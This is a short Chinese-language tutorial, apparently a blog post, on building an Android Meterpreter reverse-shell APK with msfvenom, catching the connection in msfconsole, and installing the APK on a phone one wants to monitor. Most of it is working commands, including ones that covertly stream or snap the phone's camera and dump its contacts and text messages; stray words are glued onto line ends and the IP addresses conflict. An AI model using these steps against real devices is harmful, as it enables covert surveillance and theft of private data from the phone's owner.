ifconfig查看kali的ip,ip爲222.222.221.140android
輸入命令:web
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apktcp
這裏的5555是設置的端口,也能夠本身更改,顯示這個說明已經生成成功 只有9K多大小spa
輸入命令:.net
msfconsole3d
啓動msfconsoleblog
在控制檯中輸入ip
use exploit/multi/handler //加載模塊it
set payload android/meterpreter/reverse_tcp //選擇Payloadio
show options //查看參數設置
這裏須要設置LHOST的ip地址,也就是你的kali的ip地址
還有LPORT端口,剛纔設置的爲5555,也須要更改一下(剛纔直接設置爲4444也是能夠的)
set LHOST 192.168.1.114 //這裏的地址設置成咱們剛纔生成木馬的IP地址
set LPORT 5555 //這裏的端口設置成剛纔咱們生成木馬所監聽的端口
exploit //開始執行漏洞 開始監聽,等待手機上線
接下來就要把生成的apk裝在你想監控的手機上了,等待手機上線了
而後能夠輸入sysinfo 查看手機信息
webcam_list 查看手機有多少個攝像頭 這裏顯示是2個
webcam_stream //開啓攝像頭
webcam_snap //隱祕拍照功能
dump_contacts //導出電話號碼
dump_sms //導出信息
導出的文件拍的照片都會在root下面
能夠輸入?查看更多命令
參考:https://blog.csdn.net/langtuteng17/article/details/80444115